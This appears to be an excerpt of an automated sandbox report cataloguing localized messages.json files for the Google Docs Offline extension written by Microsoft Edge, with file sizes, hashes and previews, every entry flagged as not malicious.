                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                        Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2535
Entropy (8bit):3.8479764584971368
Encrypted:false
SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:E20D6C27840B406555E2F5091B118FC5
SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:false
Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1028
Entropy (8bit):4.797571191712988
Encrypted:false
SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:970544AB4622701FFDF66DC556847652
SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:false
